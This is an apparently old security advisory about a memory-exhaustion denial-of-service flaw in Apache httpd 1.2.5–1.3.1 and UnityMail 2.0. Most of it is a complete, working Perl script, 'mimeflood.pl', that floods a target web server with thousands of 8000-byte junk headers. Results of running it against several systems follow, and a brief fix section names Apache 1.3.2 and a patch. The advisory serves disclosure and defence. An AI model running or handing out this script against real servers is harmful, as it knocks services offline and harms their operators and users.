COMMAND

    apache httpd

SYSTEMS AFFECTED

    Apache 1.2.5...1.3.1 (before?), UnityMail 2.0

PROBLEM

    Laurent FACQ found following.  This is generally a variant of  the
    Sioux DoS attack (desribed in httod #36 in 'mUNIXes' section)  and
    if  you  have  applied  the  patch  posted  by  Ben  Laurie   this
    'mimeflood'  script  won't  harm  your  server  in  any way.  Perl
    script follows:

    #! /bin/perl

    # mimeflood.pl - 02/08/1998 - L.Facq (facq@u-bordeaux.fr)

    # Web servers / possible DOS Attack / "mime header flooding"
    #
    #       looking at the apache 1.2.5 source code i found
    #       that there was no limit on how many mime headers could
    #       be included in a client request. The only limits
    #       are : 8192 byte for each header, 300 sec. on reading headers.
    #
    #       => by sending a crazy amount of 8000 bytes headers, it's possible
    #       to consume a lot of memory (and of course CPU). The point
    #       is that httpd daemons grow and STAY at this big size (or die
    #       if you send too much)
    #
    #       -> may be a limit on mime header number could be added.
    #
    #       -> may be other web server could be vulnerable to this problem.
    #
    #       - i tried on an apache 1.2.5 -> it works
    #
    ##################################################

    use Socket;

    # Usage : $0 host [port [max] ]
    $max= 0;
    if ($ARGV[2])
    {
	$max= $ARGV[2];
    }

    $proto = getprotobyname('tcp');
    socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto);
    $port = 80;
    if ($ARGV[1])
    {
	$port= $ARGV[1];
    }
    $host = $ARGV[0];
    $sin = sockaddr_in($port,inet_aton($host));

    connect(Socket_Handle,$sin);
    send Socket_Handle,"GET / HTTP/1.0\n",0;
    $val= ('z'x8000)."\n";
    $n= 1;
    $|= 1;
    while (Socket_Handle)
    {
	send Socket_Handle,"Stupidheader$n: ",0;
	send Socket_Handle,$val,0;
	$n++;
	if (!($n % 100))
	{
	    print "$n\n";
	}

	if ($max && ($n > $max))
	{
	    last;
	}
    }
    print "Done: $n\n";
    send Socket_Handle,"\n",0;

    while (<Socket_Handle>)
    {
	print $_;
    }

    After  2000  headers,  1.3.1  was  consuming  93% and stayed there
    (other processes were  consuming 7%). Script  dies after 2800  and
    Apache goes  back to  0.05%. Couldn't  crash it  (tested on  HP-UX
    10.20 / Apache 1.3.1).  On the other hand, against apache 1.3.1 on
    FreeBSD 2.2.6 (DX2-66 16Mb),  script hung after 2500  headers with
    apache using 30Mb.  Against apache 1.3.1 on NT4 (workstation)  SP3
    (P200 64Mb), after  7500 headers, apache  was using 120Mb  RAM and
    the box  ground to  a halt.   It didn't  actually crash  apache on
    either box, but severely reduced the usefulness of the systems  so
    running 1.3.1 may lead to DoS as well.

    UnityMail 2.0  for 95/NT  *IS* vulnerable  to the  DOS.   CPU load
    forks to 100%,  the system is  useable, however all  access to the
    UnityMail administrative web server is hung.

SOLUTION

    It  will  be  corrected  in  next  releases of vulnerable software
    (Apache 1.3.2).  Also, see patch in httpd #36.